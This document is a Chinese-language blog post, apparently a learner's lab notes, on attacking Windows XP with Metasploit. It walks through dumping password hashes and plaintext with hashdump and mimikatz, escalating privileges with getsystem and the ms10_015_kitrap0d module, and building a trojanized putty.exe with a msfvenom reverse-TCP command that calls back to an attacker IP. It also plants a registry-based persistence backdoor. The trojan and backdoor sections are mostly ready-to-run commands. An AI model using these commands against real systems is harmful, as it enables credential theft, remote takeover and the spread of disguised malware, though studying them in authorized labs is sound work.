使用Metasploit对WindowsXP渗透测试

使用Metasploit对WindowsXP渗透测试

哇，见识到了，渗透好猛 ^_ （大佬勿喷，我是菜鸡QAQ）

1. 破解用户口令

在我们使用漏洞渗透拿到windows的系统权限（system权限）时，就可以使用用hashdump或者scraper脚本获取用户口令hash辣~~

可以通过hash碰撞的方式获得口令明文，或者直接使用mimikatz获得口令明文（当然是选择mimikatz更快鸭！）

2. 权限提升

参考博客：点我:-)

我们需要先拿到一个权限受限的shell鸭（比如使用ms10-002漏洞 😃 ）

提升权限方法很多鸭，最简的就是getsystem了，but有时会失败

这时候通常需要绕过UAC，绕过方式就有好多好多鸭_{（主要是漏洞模块有很多}~）

可以使用万能的 post/multi/recon/local_exploit_suggester 模块，它能推荐一些可能的用于易受攻击目标提权的漏洞利用模块，老猛了！

这里我使用的是exploit/windows/local/ms10_015_kitrap0d模块，然后就能顺利提升权限了^_

3. 制作木马程序

有点猛！

putty下载链接：点我:-)

参考博客：点我:-)，点我:-)

这里将putty程序打包成木马程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.65.129 LPORT=3333 -x putty.exe -f exe -o backdoor_putty.exe

参数说明：

• -x 执行要绑定的软件
• -k 从原始的注文件中分离出来，单独创建一个进程
• -f exe指定输出格式
• -o 指定输出路径

然后就我们的木马程序就顺利的诞生了~

在攻击主机预先执行好 exploit/multi/handler 模块的情况下，一旦靶机启动木马程序，我们的攻击主机就能顺利获得目标节点的shell，很有意思 😃

4. 植入后门

参考博客：点我:-)

需要先获得靶机的run persistence -X -i 5 -p 6661 -r 192.168.65.129，然后运行如下的persistence命令就能成功植入后门，会上传一个vbs文件，并通过注册表设置开机启动，这里设置的是每五秒连接依次，另外还指定了攻击者端口和ip

run persistence -X -i 5 -p 6661 -r 192.168.65.129

参数说明（-h）：

-A        Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
-P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
-S        Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt>  Alternate executable template to use
-U        Automatically start the agent when the User logs on
-X        Automatically start the agent when the system boots
-h        This help menu
-i <opt>  The interval in seconds between each connection attempt
-p <opt>  The port on which the system running Metasploit is listening
-r <opt>  The IP of the system running Metasploit listening for the connect 

植入后门程序后就能使用 exploit/multi/handler 模块连接后门了~同制作木马程序的那一部分 😃